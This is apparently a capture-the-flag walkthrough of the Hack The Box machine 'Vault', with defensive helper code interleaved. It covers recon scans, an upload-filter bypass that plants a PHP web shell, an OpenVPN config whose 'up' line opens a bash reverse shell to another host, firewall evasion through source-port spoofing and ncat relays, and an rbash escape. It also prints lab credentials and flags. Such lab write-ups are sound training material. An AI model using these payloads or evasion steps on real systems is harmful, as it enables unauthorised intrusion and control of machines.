Title: Vault
Tags: Linux

Recon Phase

Nmap

dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV 10.10.10.109                                                      
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:48 GMT
Nmap scan report for 10.10.10.109
Host is up (0.024s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
1234/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
dang@dang-laptop ~/Documents/HTB/Frolic$   

Again we find SSH and HTTP

HTTP Enumeration

A bit of hand enumeration based on the site shows that there is something in the "Sparklays" URL.

We also end up at login.php, which returns Access denied.

Let's see what the HTTP enumeration scripts bring up....

dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV --script=http-enum 10.10.10.109                                   
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:50 GMT
Nmap scan report for 10.10.10.109
Host is up (0.024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
dang@dang-laptop ~/Documents/HTB/Frolic$    

Looking at the page, we see a search term sparkleys. Perhaps something lives there... The page is placeholder text, but it gives us a foothold with Nikto. However, Nikto shows....

$ nikto -host http://10.10.10.109/sparklays/ 
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /sparklays/admin.php: This might be interesting...
+ /sparklays/login.php: Admin login page/section found.
+ 7499 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2019-03-10 22:47:12 (GMT0) (491 seconds)

Admin page, but no creds

Try Gobuster with the common wordlist:

user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays -t 50 -w common.txt -x .php,.html,.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.109/sparklays/
[+] Threads      : 50
[+] Wordlist     : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,html,txt
[+] Timeout      : 10s
=====================================================
2019/03/10 23:05:47 Starting gobuster
=====================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htaccess (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/admin.php (Status: 200)
/admin.php (Status: 200)
/design (Status: 301)
/login.php (Status: 200)
=====================================================
2019/03/10 23:06:38 Finished
=====================================================
user@kali:/usr/share/wordlists/dirb$ 

And FFS, learning more about CTF here. Let's start enumerating deeper.

Let's also enumerate the design folder....

user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays/design -t 50 -w common.txt -x .php,.html,.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.109/sparklays/design/
[+] Threads      : 50
[+] Wordlist     : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : html,txt,php
[+] Timeout      : 10s
=====================================================
2019/03/10 23:12:15 Starting gobuster
=====================================================
/.hta (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.hta.php (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/design.html (Status: 200)
/uploads (Status: 301)
=====================================================
2019/03/10 23:13:07 Finished
=====================================================
user@kali:/usr/share/wordlists/dirb$ 

Nice, we eventually get an HTML page. Going to

http://10.10.10.109/sparklays/design/changelogo.php lets us upload images. We can then find them in http://10.10.10.109/sparklays/design/uploads/foo.jpg

So we can upload .jpg, but they come with errors. Google for stuff on upload bypass:

Examples like this fail:

<img src="http://10.10.10.109/sparklays/design//uploads/foo.php.jpg" alt="The image “http://10.10.10.109/sparklays/design//uploads/foo.php.jpg” cannot be displayed because it contains errors.">

Lets work through the other file types suggested:

  • png: fails
  • bmp: fails
  • jpg: uploads, but the image shows errors
  • txt: fails
  • php: fails
  • php5: works

So I can upload and run PHP scripts :)

And it looks like phpinfo can be uploaded. (Although it looks screwy)
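To see why foo.php5 and foo.php.jpg get past the upload check while foo.php does not, here is an added example (not code from the box or from the original writeup) contrasting a suffix blocklist with an allowlist plus magic-byte check; the function names and the sample filenames and contents are my own constructions.

```python
import os

JPEG_MAGIC = b"\xff\xd8\xff"          # first bytes of every JPEG file
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# Hypothetical allowlist for an image uploader: extension -> expected magic bytes.
ALLOWED_TYPES = {"jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC, "png": PNG_MAGIC}


def blocklist_check(name: str) -> bool:
    """Weak check of the kind seen on the box: reject only a '.php' suffix.

    'foo.php5' and 'foo.php.jpg' both pass, and a default Apache/PHP setup
    may still hand either of them to the PHP interpreter.
    """
    return not name.lower().endswith(".php")


def allowlist_check(name: str, content: bytes) -> bool:
    """Hardened form: one extension only, taken from an allowlist, and the
    file content must start with the magic bytes of the declared type."""
    base = os.path.basename(name)       # drop any directory component
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False                    # rejects 'foo.php.jpg', '.htaccess', bare names
    ext = parts[1].lower()
    if ext not in ALLOWED_TYPES:
        return False                    # rejects php, php5, phtml, txt, ...
    return content.startswith(ALLOWED_TYPES[ext])
```

Even with the allowlist, uploads should be stored under a server-generated name in a directory with no script handler; the content check only stops the cases shown here.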

Getting a Shell

This time I felt like doing something slightly different to the

cat foo.php5
<?php
system($_GET['evil']);
?>

Then going to http://10.10.10.109/sparklays/design/uploads/foo.php5?evil=ls

Gives me a directory listing :)

Possible Password in:

?evil=cat /home/dave/Desktop/key : itscominghome

And also in dave/Desktop/ssh

dave Dav3therav3123

And in Servers

DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x

However, WHERE IS THE DAMN USER.TXT???

So this would imply that the servers above are available internally.

SSH into Dave

Looks like we found SSH credentials in the recon above.

  • user: dave
  • password: Dav3thetav123

This allows us to log into the Server above.

A Maze of tunnels all alike

We found a list of servers, in ~/dave/Servers

DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x

Looks like we are going to have to traverse.

https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html https://0xdf.gitlab.io/2018/06/10/intro-to-ssh-tunneling.html

Nice one-liner for a ping sweep to check the hosts I have found.

dave@ubuntu:~/.ssh$ for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done;
64 bytes from 192.168.122.1: icmp_seq=1 ttl=64 time=0.065 ms
64 bytes from 192.168.122.4: icmp_seq=1 ttl=64 time=0.758 ms
64 bytes from 192.168.122.5: icmp_seq=1 ttl=64 time=0.881 ms
dave@ubuntu:~/.ssh$ 

What else is open? (-z makes nc just report open ports rather than send any data.)

nc -zv 192.168.122.4 1-1023

DNS Server

We know that the DNS server has an HTTP port.

Set up some tunnels to forward this:

$dave ssh -L 4242:192.168.122.4:80 dave@10.10.10.109
$dang ssh -L 4242:localhost:4242 dave@10.10.10.109

NOTE: I realise I could probably cut out a step by forwarding 122.4 straight to my server.

Main page shows a DNS config and an OpenVPN checker.

Enumerate the rest of the web site with gobuster:

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/notes (Status: 200)
/server-status (Status: 403)

The notes file contains:

chmod 123.ovpn and script.sh to 777

And we also find 123.ovpn:

remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"

and script.sh:

#!/bin/bash
sudo openvpn 123.ovpn

This may also be our way forward...

https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da

So the OpenVPN config will send a shell to port 2323 on 192.168.122.1. That's a really nifty command :P

So let's see if the damn Configurator on the website works.

Upload the 123.ovpn file.

Have a netcat listener on Dave's box (port 2323):
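An added example, not from the writeup or from the Tenable post, that audits an .ovpn profile for the directives that make this trick work: script-security at level 2 or above, plus the up/down family of hooks that run external commands. SAMPLE_OVPN is a constructed copy of the 123.ovpn shown above, and the function names are mine.

```python
# OpenVPN directives that execute an external program at some point in the
# tunnel's life. With "script-security 2" (or higher) they may run arbitrary
# user-supplied commands, which is exactly what 123.ovpn relies on.
EXEC_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect", "learn-address",
}

# Constructed copy of the profile found in /notes on the DNS box.
SAMPLE_OVPN = """remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
"""


def parse_ovpn(text):
    """Yield (directive, argument) pairs, skipping blanks and comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";")):
            continue
        directive, _, arg = line.partition(" ")
        entries.append((directive.lower(), arg.strip()))
    return entries


def audit_ovpn(text):
    """Return a list of findings for a profile; an empty list means nothing to flag."""
    findings = []
    script_security = 1          # OpenVPN default: only built-in helpers may run
    for directive, arg in parse_ovpn(text):
        if directive == "script-security":
            try:
                script_security = int(arg.split()[0])
            except (ValueError, IndexError):
                findings.append(f"unparseable script-security value: {arg!r}")
        elif directive in EXEC_DIRECTIVES:
            findings.append(f"{directive} runs an external command: {arg}")
    if script_security >= 2:
        findings.append(f"script-security {script_security} permits user-defined scripts")
    return findings
```

A web form that accepts arbitrary .ovpn files and runs them as root should refuse any profile for which this returns findings.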

Last login: Thu Mar 14 15:41:03 2019 from 10.10.10.109
dave@ubuntu:~$ nc -nvlp 2323
Listening on [0.0.0.0] (family 0, port 2323)
Connection from [192.168.122.4] port 2323 [tcp/*] accepted (family 2, sport 58896)
bash: cannot set terminal process group (1093): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html# 

And it gives us the user flag!!!

root@DNS:/home/dave# cat user.txt
cat user.txt
a4947faa8d4e1f80771d34234bd88c73

I also think I have the SSH password, so I don't need to repeat myself. Dave is also sudo, so happy days there if we lose the connection..

  • user: dave
  • password: dav3gerous567

On the DNS Box

Thrutching around on the DNS box.

Not a huge amount here in terms of files.

In /var/www/DNS we have:

auto ens3
iface ens3 inet static
address 192.168.122.4
netmask 255.255.255.0
up route add -net 192.168.5.0 netmask 255.255.255.0 gw 192.168.122.5
up route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.28

Which gives us a clue as to the addresses we are looking at.

We also have Alex (who probably set this up...), with stuff in the .bash_history:

ping 192.168.5.2
su root
nc -lvp 8888
exit

If we take a look at 192.168.5.2 we get something interesting.

Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:18 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0030s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
53/tcp   closed domain
4444/tcp closed krb524

I think the Firewall is blocking stuff....

Poking around more, in auth.log there is:

Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep  2 15:07:51 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0)
Sep  2 15:08:55 DNS sudo: pam_unix(sudo:session): session closed for user root
Sep  2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session opened for user root by (uid=0)
Sep  2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session closed for user root
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
Sep  2 15:10:20 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0)
Sep  2 15:10:34 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53

If we nmap the server pretending our source port is 4444, we find something that is open.

root@DNS:/var/log# nmap 192.168.5.2 -Pn --source-port=4444 -f

Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:28 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0035s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
987/tcp open  unknown
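For the blue-team side of those auth.log lines, an added example (not from the writeup) that parses sudo COMMAND records out of auth.log-style text and flags the firewall-evasion patterns seen here (nmap with a chosen source port or fragmentation, ncat relays with --sh-exec, outbound connects pinned to source port 53). The sample lines are constructed from the entries above plus one benign command; the regexes and function names are my own.

```python
import re

# Constructed lines modelled on the /var/log/auth.log entries quoted in the writeup.
SAMPLE_AUTH_LOG = """\
Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep  2 15:07:51 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0)
Sep  2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session opened for user root by (uid=0)
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
Sep  2 15:12:00 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/bin/ls /var/log
"""

# Matches only the "sudo: <user> : ... COMMAND=..." records, not session open/close lines.
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sudo:\s+(?P<user>\S+) : "
    r"TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# (reason, pattern) pairs: first match wins per command.
SUSPICIOUS = [
    ("nmap with spoofed source port / fragmentation",
     re.compile(r"\bnmap\b.*(--source-port|-g\s*\d+|\s-f\b)")),
    ("ncat relay executing a command per connection",
     re.compile(r"\bn?cat\b.*--(sh-exec|exec)\b")),
    ("outbound connect pinned to source port 53 (DNS bypass)",
     re.compile(r"\s-p\s*53\b")),
]


def parse_sudo_commands(log_text):
    """Return one dict per sudo COMMAND record found in the log text."""
    return [m.groupdict() for m in (SUDO_RE.match(l) for l in log_text.splitlines()) if m]


def flag_suspicious(records):
    """Return (timestamp, user, reason, command) for each record matching a pattern."""
    hits = []
    for rec in records:
        for reason, pattern in SUSPICIOUS:
            if pattern.search(rec["cmd"]):
                hits.append((rec["ts"], rec["user"], reason, rec["cmd"]))
                break
    return hits
```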

Rough idea of what is going on with ncat:

  • Listen on port 1234
  • Then start a second NC to port 987 with -p (source port) 53
  • ssh2 on 4444??

We can confirm this.... Looks like:

root@DNS:/var/log# ncat -nv 192.168.5.2 987 -p 53
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.5.2:987.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
ls
Protocol mismatch.
whoami

So are we tunneling SSH through the server??

ncat -nlv 1234 --sh-exec "/usr/bin/ncat -nv 192.168.5.2 987 -p 53"

Then we SSH into Vault (via localhost) on port 1234 (ssh takes the port as lowercase -p; -P is the scp spelling):

ssh -p 1234 dave@127.0.0.1

Our Next issue is being stuck in rbash FFS.

We can escape that using less and then !/bin/bash.

If we kill the connection we can do a reverse SCP to grab the encrypted file:

dave@DNS:~$ scp -P 1234 dave@127.0.0.1:/home/dave/root.txt.gpg .
The authenticity of host '[127.0.0.1]:1234 ([127.0.0.1]:1234)' can't be established.
ECDSA key fingerprint is SHA256:Wo70Zou+Hq5m/+G2vuKwUnJQ4Rwbzlqhq2e1JBdjEsg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:1234' (ECDSA) to the list of known hosts.
dave@127.0.0.1's password: 

Store a hexdump (as a backup):

root@DNS:/home/dave# hexdump root.txt.gpg 

We need the secret key:

root@DNS:/home/dave# gpg root.txt.gpg 
gpg: directory `/root/.gnupg' created
gpg: new configuration file `/root/.gnupg/gpg.conf' created
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/root/.gnupg/secring.gpg' created
gpg: keyring `/root/.gnupg/pubring.gpg' created
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available
root@DNS:/home/dave# 

Check what keys are available:

Not on the DNS server:

root@DNS:/var/log# gpg --list-secret-keys
gpg: /root/.gnupg/trustdb.gpg: trustdb created
root@DNS:/var/log# gpg --list-secret-keys

The key does appear to be on the first server :) And the passphrase is "itscominghome", which we found about 2 days ago in the recon part.

dave@ubuntu:/tmp$ gpg root.txt.gpg 

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
      "david <dave@david.com>"
dave@ubuntu:/tmp$ ls
root.txt      systemd-private-215c6f7f4c04468996eb09264769d510-colord.service-fzn51m        systemd-private-215c6f7f4c04468996eb09264769d510-systemd-timesyncd.service-Cstw1F  vmware-root
root.txt.gpg  systemd-private-215c6f7f4c04468996eb09264769d510-rtkit-daemon.service-mNFDbm  VMwareDnD
dave@ubuntu:/tmp$ cat root.txt
ca468370b91d1f5906e31093d9bfe819
dave@ubuntu:/tmp$ 

RABBIT: Hidden text file

There is also a .root.txt.swp

Turns out it's a Vim swap (backup) file. We may be able to recover it with vim -r (doesn't work). However, apparently the file is being edited by dave with process 4872. Can we grab that process?